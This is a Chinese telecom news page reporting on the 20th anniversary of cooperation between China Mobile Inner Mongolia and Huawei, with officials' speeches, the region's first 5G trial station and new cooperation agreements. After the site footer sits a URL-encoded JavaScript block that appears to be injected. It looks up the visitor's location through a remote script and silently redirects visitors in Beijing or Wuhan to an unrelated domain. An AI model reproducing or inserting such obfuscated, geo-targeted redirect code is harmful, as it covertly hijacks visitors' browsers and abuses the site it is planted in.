首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 运营 >> 正文

内蒙古移动与华为公司合作20周年 暨内蒙古移动5G应用展望会召开

2018年12月24日 12:47  CCTIME飞象网  

 

飞象网讯 2018年12月22日,“20载移路有为,新时代5动北疆”内蒙古移动与华为公司合作20周年暨内蒙古移动5G应用展望会在呼和浩特召开。内蒙古自治区政府副主席张韶春,自治区党委网络安全和信息化委员会办公室、自治区人民政府办公厅、自治区工业和信息化厅、自治区大数据发展管理局、自治区通信管理局等自治区有关部门领导,部分盟市政府主管领导,中国移动内蒙古公司总经理杨跃辉、华为技术有限公司中国地区部副总裁董明,以及电力、银行、能源、保险等各合作单位有关领导出席会议。大会受到社会各届高度关注,参会人数近300人。

内蒙古自治区副主席张韶春出席展望会并参观了会议展区的智慧城市、智慧畜牧、移动彩铃、5G应用等相关展示。

1998年7月,第一个国产移动通信2G基站实验网在内蒙古伊克昭盟成功开通,揭开了内蒙古移动与华为公司合作的序幕。时至今日,双方合作已20周年,共同经历了2G、3G和4G时代,为丰富人们的沟通和生活,助力自治区经济的腾飞发展做出了卓越的贡献。

内蒙古自治区人民政府办公厅巡视员曹晓斌在讲话中指出,长期以来,内蒙古移动紧密围绕自治区党委政府经济社会发展中心任务,不断加强信基础设施建设,深入推进网络提速降费,积极开展网络扶贫攻坚、电信普遍服务试点工程以及在做好网络及信息安全工作等方面做了大量卓有成效的工作。积极响应了国家要求,主动顺应了社会期盼,充分担负起了国有电信企业的政治责任、经济责任和社会责任,为提升广大人民群众幸福感和获得感,推动自治区经济社会发展,发挥了积极贡献。

内蒙古自治区通信管理局付旋局长在讲话中表示,20年来,我区移动通信完成了由模拟技术向数字技术、由小容量到大容量、由窄带到宽带的根本性换代。在这跨越发展过程中,内蒙古移动公司和华为公司发挥了重要作用。近年来,内蒙古移动公司不断采用先进技术,提升网络质量,实现有效覆盖,并积极拓展云计算、互联网和大数据等领域应用,实施了一批典型应用项目,为产业数字化发展作出了贡献。华为公司作为优秀的民族企业,不断深化与内蒙古移动公司合作,积极参与自治区信息工业基础设施建设,为自治区信息化建设和数字化转型发挥了重要支撑作用。面对未来,希望通信企业要从新形势、新变化、新要求中顺应产业变革新趋势、抢抓5G发展新机遇、努力实现网络强国建设新突破。

2018年12月15日,由内蒙古移动与华为合作的全区首个5G网络试验站在呼和浩特正式开通。该5G基站采用华为设备,可最大化利用现有4G网络的站址,完成4G与5G站点的同覆盖。本次内蒙古移动5G首站的开通,标志着内蒙古移动5G技术的试验测试环境搭建及5G业务应用示范进入了新的阶段。

5G网络作为第五代移动通信网络,其峰值理论传输速度可达每秒数十Gb,比4G网络的传输速度快数百倍。5G具有高速率、大容量、低时延的特性。5G网络每平方公里可连接的设备数量超过100万,且在传输延时上有巨大的技术突破,能成功做到“毫秒级的延时”。它将大大加速各类智能技术新应用的落地,开启移动通信发展的新时代,促成一种全移动、全连接社会的构建。

内蒙古移动总经理杨跃辉在讲话中表示,技术无止境,创新引未来。从1G空白、2G跟随、3G突破、4G“并跑”,到5G引领,中国移动不断深化“大连接”战略,助力网络强国建设。3G时代,我们推出自主研发标准TD-SCDMA,实现了从“无芯”到“有芯”的突破,并被列为国际标准之一。4G时代,我们建成了全区最大4G精品网络,4G用户超过1200万。积极落实自治区大数据战略和“互联网+”行动,提高云计算、大数据、物联网等数字化服务能力。4G方兴未艾,5G已扑面而来。中国移动在5G技术创新和标准上实现全面引领,在全球运营商里处于首位。内蒙古移动未来将进一步扩大5G业务试验站规模,以此为契机夯实“客户为根、服务为本”的发展理念,深化公司“大连接”战略落实,继续发挥4G领先优势,整合5G产业链相关资源,加快远程医疗、车联网、智慧城市、智慧畜牧等方面的5G应用落地,培养5G新生态,充分展示“信息随心至,万物触手及”的5G时代特色,不断为客户带来更优质的业务体验。

为进一步推动产业落地,本次会议进行了内蒙古移动与华为成立行业应用联合创意展示中心揭牌以及六大签约仪式。签约内容分别是内蒙古自治区党委网络安全和信息化委员会办公室与内蒙古移动、华为关于信息化战略合作签约,内蒙古自治区工业和信息化厅与内蒙古移动、华为关于内蒙古数字化转型战略合作签约,内蒙古自治区大数据发展管理局与内蒙古移动、华为关于信息化战略合作签约,内蒙古移动与包头钢铁(集团)有限责任公司、华为关于信息化转型战略合作签约,北京嘀嘀无限科技发展有限公司与内蒙古移动战略合作签约,内蒙古移动与华为面向未来两年战略合作签约。

4G改变生活,5G改变社会。5G的到来,不仅仅会带来更高速的网络,还会对社会管理、工业自动化、智能交通、智慧家庭等各个方面带来革命性的改变。面对5G发展和产业变革进程加快的新趋势,内蒙古移动将以更开放的姿态,顺势而为、因时而动,继续深化推进“大连接”战略落地,进一步挖掘4G发展空间,加快5G发展步伐,携手产业伙伴促进数字化创新,为自治区的经济转型和民生发展注入新动力。

编 辑:孙秀杰
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E